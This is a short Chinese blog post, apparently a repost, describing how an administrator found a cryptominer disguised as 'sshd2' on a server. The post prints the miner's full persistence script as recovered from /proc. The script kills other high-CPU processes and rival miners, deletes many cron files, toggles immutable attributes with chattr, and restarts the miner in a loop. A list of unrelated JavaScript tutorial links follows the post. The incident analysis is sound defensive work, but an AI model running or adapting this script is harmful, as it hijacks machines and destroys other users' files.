一个挖矿脚本
时间:2019-08-07
本文章向大家介绍一个挖矿脚本,主要包括一个挖矿脚本使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
遇到一台机器偶尔cpu使用率达到80%,触发告警。登录查看后一个sshd2程序导致cpu负载高
仔细查看就知道和sshd是两个完全不同的进程,取名sshd2应该只是为了迷惑用户
ps -ef
查看到父进程是一个/tmp/javax/config.sh, 这个文件在当前系统已经删除了,所以只能按照pid号通过lsof -p PID查看打开的文件句柄
在/proc/PID/fd里面顺利找到执行脚本
#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
while [ 1 ]
do
p=$(ps auxf|grep -v grep|grep sshd2|wc -l)
if [ ${p} -eq 0 ];
then
ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9
fi
chattr -i /var/spool/cron/root
chattr -i /var/spool/cron/crontabs/root
chattr -i /usr/local/bin/dns
pkill 6Tx3Wq
rm -f /tmp/6Tx3Wq
killall -9 38c985b26d38da0cbcc9f8ae3527e8e3b
killall -9 /tmp/.sysinfo/*
rm -f /tmp/.sysinfo/*
chattr +i /tmp/.sysinfo
rm -f /var/spool/cron/root
rm -f /var/spool/cron/backup.db
rm -f /var/spool/cron/dump.rdb
rm -f /var/spool/cron/jw
rm -f /var/spool/cron/uo
rm -f /var/spool/cron/vf
rm -f /tmp/root
rm -f /tmp/backup.db
rm -f /tmp/dump.rdb
rm -f /tmp/root
rm -f /var/spool/cron/crontabs/root
rm -f /var/spool/cron/crontabs/dump.rdb
killall -9 kworkerds
chattr -i /etc/cron.d/root
chattr -i /etc/cron.d/apache
chattr -i /etc/cron.d/0hourly
rm -f /etc/cron.d/root
rm -f /etc/cron.d/apache
rm -f /etc/cron.d/0hourly
rm -f /tmp/kworkerds
rm -f /var/tmp/kworkerds
rm -f /etc/cron.hourly/oanacroner
rm -f /etc/cron.hourly/oanacrona
rm -f /etc/cron.daily/oanacroner
rm -f /etc/cron.daily/oanacrona
rm -f /etc/cron.monthly/oanacroner
rm -f /usr/local/bin/dns
pkill .systemcero
pkill vTtHH
pkill -f /tmp/just4root
pkill -f /tmp/just4copy
pkill -f /tmp/dc_name
pkill x7
pkill cloudupdate
pkill diskmanagerd
pkill curl
pkill jspserv
pkill init
pkill sysupdate
pkill sysguard
pkill networkservice
pkill watchbog
rm -f /usr/share/watchbog/watchbog
rm -f /bin/httpsntp
rm -f /bin/ftpsntp
rm -f /tmp/.systemcero
rm -f /tmp/vTtHH
rm -f /usr/bin/.systemcero
rm -f /usr/bin/cloudupdate
rm -f /usr/bin/diskmanagerd
rm -f /lib/libterminfo.so
rm -f /tmp/config.json
rm -f /var/tmp/jspserv
rm -f /etc/update.sh
chattr -i /etc/sysupdate
rm -f /etc/sysupdate
rm -f /etc/config.json
echo >/tmp/6Tx3Wq
echo >/tmp/vTtHH
chattr +i /tmp/6Tx3Wq
chattr +i /tmp/vTtHH
p=$(ps auxf|grep sshd2|awk '{if($3>=70.0) print $2}')
name=""$p
if [ -z "$name" ]
then
ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9
nohup /tmp/javax/sshd2 &>>/dev/null &
else
:
fi
sleep 60
done
从脚本的删除动作来看,可能是通过redis的漏洞进来的,脚本似乎还想努力不让监控发现
原文地址:https://www.cnblogs.com/mikeguan/p/11314005.html
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 【自动化测试】【Jest-Selenium】(01)—— Jest 入门
- 设计模式:原型模式
- 后端逆袭,一份不可多得的PHP学习指南
- 走进Java接口测试之工具类库 Hutool
- Go开源游戏服务器框架——Pitaya
- 性能分析之pidstat新版本的%wait和mpstat的%iowait、top的wa
- 走进Java接口测试之整合ELK实现日志收集
- 【一天一大 lee】 监控二叉树 (难度:困难)-Day20200922
- 网络学习笔记2——物理层基础(信号与系统)(未完待续)
- 浅谈 React 中的 XSS 攻击
- Chrome 80+ 跨域Samesite 导致的cookie not found 解决方法
- 再不迁移到Material Design Components 就out啦
- hbase 学习
- 再谈Fragment
- java线程池(四):ForkJoinPool的使用及基本原理